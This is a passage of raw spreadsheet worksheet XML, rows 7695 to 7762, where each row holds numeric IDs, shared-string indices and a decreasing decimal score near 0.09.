      </c>
      <c r="D7695" s="2">
        <v>1.0</v>
      </c>
      <c r="E7695" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7695" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7696" ht="15.75" customHeight="1">
      <c r="A7696" s="1">
        <v>16763.0</v>
      </c>
      <c r="B7696" s="2">
        <v>4.7630039E7</v>
      </c>
      <c r="C7696" s="2" t="s">
        <v>7304</v>
      </c>
      <c r="D7696" s="2">
        <v>1.0</v>
      </c>
      <c r="E7696" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7696" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7697" ht="15.75" customHeight="1">
      <c r="A7697" s="1">
        <v>18806.0</v>
      </c>
      <c r="B7697" s="2">
        <v>5.3882753E7</v>
      </c>
      <c r="C7697" s="2" t="s">
        <v>7305</v>
      </c>
      <c r="D7697" s="2">
        <v>1.0</v>
      </c>
      <c r="E7697" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7697" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7698" ht="15.75" customHeight="1">
      <c r="A7698" s="1">
        <v>19774.0</v>
      </c>
      <c r="B7698" s="2">
        <v>5.6764674E7</v>
      </c>
      <c r="C7698" s="2" t="s">
        <v>7306</v>
      </c>
      <c r="D7698" s="2">
        <v>1.0</v>
      </c>
      <c r="E7698" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7698" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7699" ht="15.75" customHeight="1">
      <c r="A7699" s="1">
        <v>21790.0</v>
      </c>
      <c r="B7699" s="2">
        <v>2.6608259E7</v>
      </c>
      <c r="C7699" s="2" t="s">
        <v>7307</v>
      </c>
      <c r="D7699" s="2">
        <v>1.0</v>
      </c>
      <c r="E7699" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7699" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7700" ht="15.75" customHeight="1">
      <c r="A7700" s="1">
        <v>22010.0</v>
      </c>
      <c r="B7700" s="2">
        <v>2.9846407E7</v>
      </c>
      <c r="C7700" s="2" t="s">
        <v>7308</v>
      </c>
      <c r="D7700" s="2">
        <v>1.0</v>
      </c>
      <c r="E7700" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7700" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7701" ht="15.75" customHeight="1">
      <c r="A7701" s="1">
        <v>23285.0</v>
      </c>
      <c r="B7701" s="2">
        <v>5.3748046E7</v>
      </c>
      <c r="C7701" s="2" t="s">
        <v>7309</v>
      </c>
      <c r="D7701" s="2">
        <v>1.0</v>
      </c>
      <c r="E7701" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7701" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7702" ht="15.75" customHeight="1">
      <c r="A7702" s="1">
        <v>23400.0</v>
      </c>
      <c r="B7702" s="2">
        <v>5.578343E7</v>
      </c>
      <c r="C7702" s="2" t="s">
        <v>7310</v>
      </c>
      <c r="D7702" s="2">
        <v>1.0</v>
      </c>
      <c r="E7702" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7702" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7703" ht="15.75" customHeight="1">
      <c r="A7703" s="1">
        <v>23567.0</v>
      </c>
      <c r="B7703" s="2">
        <v>6185504.0</v>
      </c>
      <c r="C7703" s="2" t="s">
        <v>7311</v>
      </c>
      <c r="D7703" s="2">
        <v>1.0</v>
      </c>
      <c r="E7703" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7703" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7704" ht="15.75" customHeight="1">
      <c r="A7704" s="1">
        <v>24088.0</v>
      </c>
      <c r="B7704" s="2">
        <v>9758067.0</v>
      </c>
      <c r="C7704" s="2" t="s">
        <v>7312</v>
      </c>
      <c r="D7704" s="2">
        <v>1.0</v>
      </c>
      <c r="E7704" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7704" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7705" ht="15.75" customHeight="1">
      <c r="A7705" s="1">
        <v>25137.0</v>
      </c>
      <c r="B7705" s="2">
        <v>1.301877E7</v>
      </c>
      <c r="C7705" s="2" t="s">
        <v>7313</v>
      </c>
      <c r="D7705" s="2">
        <v>1.0</v>
      </c>
      <c r="E7705" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7705" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7706" ht="15.75" customHeight="1">
      <c r="A7706" s="1">
        <v>26066.0</v>
      </c>
      <c r="B7706" s="2">
        <v>1.5576277E7</v>
      </c>
      <c r="C7706" s="2" t="s">
        <v>7314</v>
      </c>
      <c r="D7706" s="2">
        <v>1.0</v>
      </c>
      <c r="E7706" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7706" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7707" ht="15.75" customHeight="1">
      <c r="A7707" s="1">
        <v>26397.0</v>
      </c>
      <c r="B7707" s="2">
        <v>1.7018922E7</v>
      </c>
      <c r="C7707" s="2" t="s">
        <v>7315</v>
      </c>
      <c r="D7707" s="2">
        <v>1.0</v>
      </c>
      <c r="E7707" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7707" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7708" ht="15.75" customHeight="1">
      <c r="A7708" s="1">
        <v>27877.0</v>
      </c>
      <c r="B7708" s="2">
        <v>2.354899E7</v>
      </c>
      <c r="C7708" s="2" t="s">
        <v>7316</v>
      </c>
      <c r="D7708" s="2">
        <v>1.0</v>
      </c>
      <c r="E7708" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7708" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7709" ht="15.75" customHeight="1">
      <c r="A7709" s="1">
        <v>28923.0</v>
      </c>
      <c r="B7709" s="2">
        <v>2.9524788E7</v>
      </c>
      <c r="C7709" s="2" t="s">
        <v>7317</v>
      </c>
      <c r="D7709" s="2">
        <v>1.0</v>
      </c>
      <c r="E7709" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7709" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7710" ht="15.75" customHeight="1">
      <c r="A7710" s="1">
        <v>28988.0</v>
      </c>
      <c r="B7710" s="2">
        <v>2.9846406E7</v>
      </c>
      <c r="C7710" s="2" t="s">
        <v>7318</v>
      </c>
      <c r="D7710" s="2">
        <v>1.0</v>
      </c>
      <c r="E7710" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7710" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7711" ht="15.75" customHeight="1">
      <c r="A7711" s="1">
        <v>29708.0</v>
      </c>
      <c r="B7711" s="2">
        <v>3.4377877E7</v>
      </c>
      <c r="C7711" s="2" t="s">
        <v>7319</v>
      </c>
      <c r="D7711" s="2">
        <v>1.0</v>
      </c>
      <c r="E7711" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7711" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7712" ht="15.75" customHeight="1">
      <c r="A7712" s="1">
        <v>29766.0</v>
      </c>
      <c r="B7712" s="2">
        <v>3.4850968E7</v>
      </c>
      <c r="C7712" s="2" t="s">
        <v>7320</v>
      </c>
      <c r="D7712" s="2">
        <v>1.0</v>
      </c>
      <c r="E7712" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7712" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7713" ht="15.75" customHeight="1">
      <c r="A7713" s="1">
        <v>30724.0</v>
      </c>
      <c r="B7713" s="2">
        <v>4.3612397E7</v>
      </c>
      <c r="C7713" s="2" t="s">
        <v>7321</v>
      </c>
      <c r="D7713" s="2">
        <v>1.0</v>
      </c>
      <c r="E7713" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7713" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7714" ht="15.75" customHeight="1">
      <c r="A7714" s="1">
        <v>31305.0</v>
      </c>
      <c r="B7714" s="2">
        <v>4967863.0</v>
      </c>
      <c r="C7714" s="2" t="s">
        <v>7322</v>
      </c>
      <c r="D7714" s="2">
        <v>1.0</v>
      </c>
      <c r="E7714" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7714" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7715" ht="15.75" customHeight="1">
      <c r="A7715" s="1">
        <v>32302.0</v>
      </c>
      <c r="B7715" s="2">
        <v>5.5581818E7</v>
      </c>
      <c r="C7715" s="2" t="s">
        <v>7323</v>
      </c>
      <c r="D7715" s="2">
        <v>1.0</v>
      </c>
      <c r="E7715" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7715" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7716" ht="15.75" customHeight="1">
      <c r="A7716" s="1">
        <v>32477.0</v>
      </c>
      <c r="B7716" s="2">
        <v>5692075.0</v>
      </c>
      <c r="C7716" s="2" t="s">
        <v>7324</v>
      </c>
      <c r="D7716" s="2">
        <v>1.0</v>
      </c>
      <c r="E7716" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7716" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7717" ht="15.75" customHeight="1">
      <c r="A7717" s="1">
        <v>33371.0</v>
      </c>
      <c r="B7717" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C7717" s="2" t="s">
        <v>7325</v>
      </c>
      <c r="D7717" s="2">
        <v>1.0</v>
      </c>
      <c r="E7717" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7717" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="7718" ht="15.75" customHeight="1">
      <c r="A7718" s="1">
        <v>23532.0</v>
      </c>
      <c r="B7718" s="2">
        <v>5918687.0</v>
      </c>
      <c r="C7718" s="2" t="s">
        <v>7326</v>
      </c>
      <c r="D7718" s="2">
        <v>1.0</v>
      </c>
      <c r="E7718" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7718" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="7719" ht="15.75" customHeight="1">
      <c r="A7719" s="1">
        <v>32052.0</v>
      </c>
      <c r="B7719" s="2">
        <v>5.3748045E7</v>
      </c>
      <c r="C7719" s="2" t="s">
        <v>7327</v>
      </c>
      <c r="D7719" s="2">
        <v>1.0</v>
      </c>
      <c r="E7719" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7719" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="7720" ht="15.75" customHeight="1">
      <c r="A7720" s="1">
        <v>33268.0</v>
      </c>
      <c r="B7720" s="2">
        <v>7367910.0</v>
      </c>
      <c r="C7720" s="2" t="s">
        <v>7328</v>
      </c>
      <c r="D7720" s="2">
        <v>1.0</v>
      </c>
      <c r="E7720" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7720" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="7721" ht="15.75" customHeight="1">
      <c r="A7721" s="1">
        <v>18064.0</v>
      </c>
      <c r="B7721" s="2">
        <v>5.1603887E7</v>
      </c>
      <c r="C7721" s="2" t="s">
        <v>7329</v>
      </c>
      <c r="D7721" s="2">
        <v>1.0</v>
      </c>
      <c r="E7721" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7721" s="2">
        <v>0.09538784067085955</v>
      </c>
    </row>
    <row r="7722" ht="15.75" customHeight="1">
      <c r="A7722" s="1">
        <v>15453.0</v>
      </c>
      <c r="B7722" s="2">
        <v>4.3041595E7</v>
      </c>
      <c r="C7722" s="2" t="s">
        <v>7330</v>
      </c>
      <c r="D7722" s="2">
        <v>1.0</v>
      </c>
      <c r="E7722" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7722" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="7723" ht="15.75" customHeight="1">
      <c r="A7723" s="1">
        <v>5826.0</v>
      </c>
      <c r="B7723" s="2">
        <v>4.6888216E7</v>
      </c>
      <c r="C7723" s="2" t="s">
        <v>7331</v>
      </c>
      <c r="D7723" s="2">
        <v>1.0</v>
      </c>
      <c r="E7723" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7723" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="7724" ht="15.75" customHeight="1">
      <c r="A7724" s="1">
        <v>14084.0</v>
      </c>
      <c r="B7724" s="2">
        <v>3.7683691E7</v>
      </c>
      <c r="C7724" s="2" t="s">
        <v>7332</v>
      </c>
      <c r="D7724" s="2">
        <v>1.0</v>
      </c>
      <c r="E7724" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7724" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="7725" ht="15.75" customHeight="1">
      <c r="A7725" s="1">
        <v>21892.0</v>
      </c>
      <c r="B7725" s="2">
        <v>2.7804169E7</v>
      </c>
      <c r="C7725" s="2" t="s">
        <v>7333</v>
      </c>
      <c r="D7725" s="2">
        <v>1.0</v>
      </c>
      <c r="E7725" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7725" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="7726" ht="15.75" customHeight="1">
      <c r="A7726" s="1">
        <v>22001.0</v>
      </c>
      <c r="B7726" s="2">
        <v>2.9693784E7</v>
      </c>
      <c r="C7726" s="2" t="s">
        <v>7334</v>
      </c>
      <c r="D7726" s="2">
        <v>1.0</v>
      </c>
      <c r="E7726" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7726" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="7727" ht="15.75" customHeight="1">
      <c r="A7727" s="1">
        <v>22188.0</v>
      </c>
      <c r="B7727" s="2">
        <v>3.1751568E7</v>
      </c>
      <c r="C7727" s="2" t="s">
        <v>7335</v>
      </c>
      <c r="D7727" s="2">
        <v>1.0</v>
      </c>
      <c r="E7727" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7727" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="7728" ht="15.75" customHeight="1">
      <c r="A7728" s="1">
        <v>23780.0</v>
      </c>
      <c r="B7728" s="2">
        <v>7632038.0</v>
      </c>
      <c r="C7728" s="2" t="s">
        <v>7336</v>
      </c>
      <c r="D7728" s="2">
        <v>1.0</v>
      </c>
      <c r="E7728" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7728" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="7729" ht="15.75" customHeight="1">
      <c r="A7729" s="1">
        <v>26138.0</v>
      </c>
      <c r="B7729" s="2">
        <v>1.6031238E7</v>
      </c>
      <c r="C7729" s="2" t="s">
        <v>7337</v>
      </c>
      <c r="D7729" s="2">
        <v>1.0</v>
      </c>
      <c r="E7729" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7729" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="7730" ht="15.75" customHeight="1">
      <c r="A7730" s="1">
        <v>31497.0</v>
      </c>
      <c r="B7730" s="2">
        <v>5064657.0</v>
      </c>
      <c r="C7730" s="2" t="s">
        <v>2350</v>
      </c>
      <c r="D7730" s="2">
        <v>1.0</v>
      </c>
      <c r="E7730" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7730" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="7731" ht="15.75" customHeight="1">
      <c r="A7731" s="1">
        <v>32508.0</v>
      </c>
      <c r="B7731" s="2">
        <v>5715360.0</v>
      </c>
      <c r="C7731" s="2" t="s">
        <v>7338</v>
      </c>
      <c r="D7731" s="2">
        <v>1.0</v>
      </c>
      <c r="E7731" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7731" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="7732" ht="15.75" customHeight="1">
      <c r="A7732" s="1">
        <v>33182.0</v>
      </c>
      <c r="B7732" s="2">
        <v>7109005.0</v>
      </c>
      <c r="C7732" s="2" t="s">
        <v>7339</v>
      </c>
      <c r="D7732" s="2">
        <v>1.0</v>
      </c>
      <c r="E7732" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7732" s="2">
        <v>0.09477124183006534</v>
      </c>
    </row>
    <row r="7733" ht="15.75" customHeight="1">
      <c r="A7733" s="1">
        <v>26891.0</v>
      </c>
      <c r="B7733" s="2">
        <v>1.9254453E7</v>
      </c>
      <c r="C7733" s="2" t="s">
        <v>7340</v>
      </c>
      <c r="D7733" s="2">
        <v>1.0</v>
      </c>
      <c r="E7733" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7733" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="7734" ht="15.75" customHeight="1">
      <c r="A7734" s="1">
        <v>15013.0</v>
      </c>
      <c r="B7734" s="2">
        <v>4.150099E7</v>
      </c>
      <c r="C7734" s="2" t="s">
        <v>7341</v>
      </c>
      <c r="D7734" s="2">
        <v>1.0</v>
      </c>
      <c r="E7734" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7734" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="7735" ht="15.75" customHeight="1">
      <c r="A7735" s="1">
        <v>32682.0</v>
      </c>
      <c r="B7735" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C7735" s="2" t="s">
        <v>7342</v>
      </c>
      <c r="D7735" s="2">
        <v>1.0</v>
      </c>
      <c r="E7735" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7735" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="7736" ht="15.75" customHeight="1">
      <c r="A7736" s="1">
        <v>34123.0</v>
      </c>
      <c r="B7736" s="2">
        <v>9768682.0</v>
      </c>
      <c r="C7736" s="2" t="s">
        <v>7343</v>
      </c>
      <c r="D7736" s="2">
        <v>1.0</v>
      </c>
      <c r="E7736" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7736" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="7737" ht="15.75" customHeight="1">
      <c r="A7737" s="1">
        <v>1539.0</v>
      </c>
      <c r="B7737" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C7737" s="2" t="s">
        <v>7344</v>
      </c>
      <c r="D7737" s="2">
        <v>1.0</v>
      </c>
      <c r="E7737" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7737" s="2">
        <v>0.0942460317460317</v>
      </c>
    </row>
    <row r="7738" ht="15.75" customHeight="1">
      <c r="A7738" s="1">
        <v>16180.0</v>
      </c>
      <c r="B7738" s="2">
        <v>4.5653148E7</v>
      </c>
      <c r="C7738" s="2" t="s">
        <v>7345</v>
      </c>
      <c r="D7738" s="2">
        <v>1.0</v>
      </c>
      <c r="E7738" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7738" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="7739" ht="15.75" customHeight="1">
      <c r="A7739" s="1">
        <v>25907.0</v>
      </c>
      <c r="B7739" s="2">
        <v>1.506872E7</v>
      </c>
      <c r="C7739" s="2" t="s">
        <v>7346</v>
      </c>
      <c r="D7739" s="2">
        <v>1.0</v>
      </c>
      <c r="E7739" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7739" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="7740" ht="15.75" customHeight="1">
      <c r="A7740" s="1">
        <v>27427.0</v>
      </c>
      <c r="B7740" s="2">
        <v>2.1901851E7</v>
      </c>
      <c r="C7740" s="2" t="s">
        <v>7347</v>
      </c>
      <c r="D7740" s="2">
        <v>1.0</v>
      </c>
      <c r="E7740" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7740" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="7741" ht="15.75" customHeight="1">
      <c r="A7741" s="1">
        <v>33015.0</v>
      </c>
      <c r="B7741" s="2">
        <v>6653363.0</v>
      </c>
      <c r="C7741" s="2" t="s">
        <v>7348</v>
      </c>
      <c r="D7741" s="2">
        <v>1.0</v>
      </c>
      <c r="E7741" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7741" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="7742" ht="15.75" customHeight="1">
      <c r="A7742" s="1">
        <v>112.0</v>
      </c>
      <c r="B7742" s="2">
        <v>1.2958827E7</v>
      </c>
      <c r="C7742" s="2" t="s">
        <v>7349</v>
      </c>
      <c r="D7742" s="2">
        <v>1.0</v>
      </c>
      <c r="E7742" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7742" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="7743" ht="15.75" customHeight="1">
      <c r="A7743" s="1">
        <v>862.0</v>
      </c>
      <c r="B7743" s="2">
        <v>2.1783475E7</v>
      </c>
      <c r="C7743" s="2" t="s">
        <v>7350</v>
      </c>
      <c r="D7743" s="2">
        <v>1.0</v>
      </c>
      <c r="E7743" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7743" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="7744" ht="15.75" customHeight="1">
      <c r="A7744" s="1">
        <v>7398.0</v>
      </c>
      <c r="B7744" s="2">
        <v>5.1104232E7</v>
      </c>
      <c r="C7744" s="2" t="s">
        <v>7351</v>
      </c>
      <c r="D7744" s="2">
        <v>1.0</v>
      </c>
      <c r="E7744" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7744" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="7745" ht="15.75" customHeight="1">
      <c r="A7745" s="1">
        <v>11126.0</v>
      </c>
      <c r="B7745" s="2">
        <v>1903272.0</v>
      </c>
      <c r="C7745" s="2" t="s">
        <v>7352</v>
      </c>
      <c r="D7745" s="2">
        <v>1.0</v>
      </c>
      <c r="E7745" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7745" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="7746" ht="15.75" customHeight="1">
      <c r="A7746" s="1">
        <v>22725.0</v>
      </c>
      <c r="B7746" s="2">
        <v>4.3717533E7</v>
      </c>
      <c r="C7746" s="2" t="s">
        <v>7353</v>
      </c>
      <c r="D7746" s="2">
        <v>1.0</v>
      </c>
      <c r="E7746" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7746" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="7747" ht="15.75" customHeight="1">
      <c r="A7747" s="1">
        <v>23990.0</v>
      </c>
      <c r="B7747" s="2">
        <v>9187452.0</v>
      </c>
      <c r="C7747" s="2" t="s">
        <v>7354</v>
      </c>
      <c r="D7747" s="2">
        <v>1.0</v>
      </c>
      <c r="E7747" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7747" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="7748" ht="15.75" customHeight="1">
      <c r="A7748" s="1">
        <v>25808.0</v>
      </c>
      <c r="B7748" s="2">
        <v>1.4739876E7</v>
      </c>
      <c r="C7748" s="2" t="s">
        <v>7355</v>
      </c>
      <c r="D7748" s="2">
        <v>1.0</v>
      </c>
      <c r="E7748" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7748" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="7749" ht="15.75" customHeight="1">
      <c r="A7749" s="1">
        <v>28249.0</v>
      </c>
      <c r="B7749" s="2">
        <v>2.5256132E7</v>
      </c>
      <c r="C7749" s="2" t="s">
        <v>7283</v>
      </c>
      <c r="D7749" s="2">
        <v>1.0</v>
      </c>
      <c r="E7749" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7749" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="7750" ht="15.75" customHeight="1">
      <c r="A7750" s="1">
        <v>31148.0</v>
      </c>
      <c r="B7750" s="2">
        <v>4889847.0</v>
      </c>
      <c r="C7750" s="2" t="s">
        <v>7356</v>
      </c>
      <c r="D7750" s="2">
        <v>1.0</v>
      </c>
      <c r="E7750" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7750" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="7751" ht="15.75" customHeight="1">
      <c r="A7751" s="1">
        <v>23594.0</v>
      </c>
      <c r="B7751" s="2">
        <v>6356527.0</v>
      </c>
      <c r="C7751" s="2" t="s">
        <v>7357</v>
      </c>
      <c r="D7751" s="2">
        <v>1.0</v>
      </c>
      <c r="E7751" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7751" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="7752" ht="15.75" customHeight="1">
      <c r="A7752" s="1">
        <v>3770.0</v>
      </c>
      <c r="B7752" s="2">
        <v>3.9828853E7</v>
      </c>
      <c r="C7752" s="2" t="s">
        <v>7358</v>
      </c>
      <c r="D7752" s="2">
        <v>1.0</v>
      </c>
      <c r="E7752" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7752" s="2">
        <v>0.09294871794871794</v>
      </c>
    </row>
    <row r="7753" ht="15.75" customHeight="1">
      <c r="A7753" s="1">
        <v>19238.0</v>
      </c>
      <c r="B7753" s="2">
        <v>5.5076815E7</v>
      </c>
      <c r="C7753" s="2" t="s">
        <v>7359</v>
      </c>
      <c r="D7753" s="2">
        <v>1.0</v>
      </c>
      <c r="E7753" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7753" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="7754" ht="15.75" customHeight="1">
      <c r="A7754" s="1">
        <v>1873.0</v>
      </c>
      <c r="B7754" s="2">
        <v>2.9648411E7</v>
      </c>
      <c r="C7754" s="2" t="s">
        <v>7360</v>
      </c>
      <c r="D7754" s="2">
        <v>1.0</v>
      </c>
      <c r="E7754" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7754" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7755" ht="15.75" customHeight="1">
      <c r="A7755" s="1">
        <v>6348.0</v>
      </c>
      <c r="B7755" s="2">
        <v>4.8316876E7</v>
      </c>
      <c r="C7755" s="2" t="s">
        <v>7361</v>
      </c>
      <c r="D7755" s="2">
        <v>1.0</v>
      </c>
      <c r="E7755" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7755" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7756" ht="15.75" customHeight="1">
      <c r="A7756" s="1">
        <v>9417.0</v>
      </c>
      <c r="B7756" s="2">
        <v>5.5785068E7</v>
      </c>
      <c r="C7756" s="2" t="s">
        <v>7362</v>
      </c>
      <c r="D7756" s="2">
        <v>1.0</v>
      </c>
      <c r="E7756" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7756" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7757" ht="15.75" customHeight="1">
      <c r="A7757" s="1">
        <v>16500.0</v>
      </c>
      <c r="B7757" s="2">
        <v>4.6588053E7</v>
      </c>
      <c r="C7757" s="2" t="s">
        <v>7363</v>
      </c>
      <c r="D7757" s="2">
        <v>1.0</v>
      </c>
      <c r="E7757" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7757" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7758" ht="15.75" customHeight="1">
      <c r="A7758" s="1">
        <v>20049.0</v>
      </c>
      <c r="B7758" s="2">
        <v>7946275.0</v>
      </c>
      <c r="C7758" s="2" t="s">
        <v>7364</v>
      </c>
      <c r="D7758" s="2">
        <v>1.0</v>
      </c>
      <c r="E7758" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7758" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7759" ht="15.75" customHeight="1">
      <c r="A7759" s="1">
        <v>20200.0</v>
      </c>
      <c r="B7759" s="2">
        <v>1.0580679E7</v>
      </c>
      <c r="C7759" s="2" t="s">
        <v>7365</v>
      </c>
      <c r="D7759" s="2">
        <v>1.0</v>
      </c>
      <c r="E7759" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7759" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7760" ht="15.75" customHeight="1">
      <c r="A7760" s="1">
        <v>22003.0</v>
      </c>
      <c r="B7760" s="2">
        <v>2.978463E7</v>
      </c>
      <c r="C7760" s="2" t="s">
        <v>7366</v>
      </c>
      <c r="D7760" s="2">
        <v>1.0</v>
      </c>
      <c r="E7760" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7760" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7761" ht="15.75" customHeight="1">
      <c r="A7761" s="1">
        <v>22416.0</v>
      </c>
      <c r="B7761" s="2">
        <v>3.6037736E7</v>
      </c>
      <c r="C7761" s="2" t="s">
        <v>7367</v>
      </c>
      <c r="D7761" s="2">
        <v>1.0</v>
      </c>
      <c r="E7761" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7761" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="7762" ht="15.75" customHeight="1">
      <c r="A7762" s="1">
        <v>23478.0</v>
      </c>
      <c r="B7762" s="2">
        <v>5728787.0</v>
      </c>
      <c r="C7762" s="2" t="s">
        <v>7368</v>
      </c>
      <c r="D7762" s="2">
        <v>1.0</v>
      </c>
